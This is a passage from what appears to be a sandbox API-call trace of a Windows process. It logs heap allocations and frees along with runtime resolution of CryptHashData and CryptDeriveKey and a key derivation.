lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0238.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0238.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0238.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0238.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0238.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0238.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0238.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0238.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0238.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0238.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0238.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0238.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0238.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0238.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0238.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0238.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0238.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0238.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0238.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0238.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0238.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0238.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0238.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0238.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0238.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0238.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0238.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0238.372] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0238.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0238.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0238.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0238.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0238.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0238.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0238.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0238.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0238.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0238.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0238.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0238.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0238.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0238.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0238.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0238.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0238.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0238.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0238.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0238.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0238.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0238.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0238.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0238.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0238.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0238.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0238.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0238.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0238.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0238.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0238.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0238.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0238.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0238.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0238.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0238.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0238.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0238.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0238.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0238.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0238.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51460, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0238.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0238.374] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0238.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0238.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0238.374] CryptHashData (hHash=0xa87110, pbData=0x2e54f58, dwDataLen=0x3, dwFlags=0x1) returned 1 [0238.375] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.375] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0238.375] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.375] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0238.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0238.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0238.375] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0238.375] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0238.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0238.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.375] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0238.375] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0238.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0238.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0238.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0238.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0238.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0238.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0238.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0238.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0238.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0238.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0238.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0238.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0238.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0238.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0238.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0238.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0238.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0238.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0238.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0238.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0238.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0238.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0238.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0238.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0238.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0238.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0238.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0238.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0238.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0238.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0238.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0238.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0238.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0238.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0238.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0238.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0238.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0238.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0238.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0238.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0238.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0238.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0238.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0238.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0238.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0238.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0238.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0238.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0238.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0238.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0238.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0238.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0238.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0238.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0238.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0238.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0238.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0238.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0238.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51550 [0238.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51550, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0238.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0238.378] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0238.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0238.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0238.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0238.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0238.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0238.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0238.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0238.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0238.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0238.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0238.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0238.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0238.378] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87110, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87690) returned 1 [0238.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0238.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0238.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0238.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0238.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0238.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0238.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0238.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0238.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0238.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0238.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0238.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0238.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0238.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0238.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0238.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0238.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0238.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0238.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0238.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0238.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0238.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0238.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0238.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0238.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0238.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0238.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0238.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0238.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0238.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0238.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0238.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0238.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0238.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0238.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0238.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0238.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0238.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0238.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0238.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0238.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0238.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0238.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0238.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: 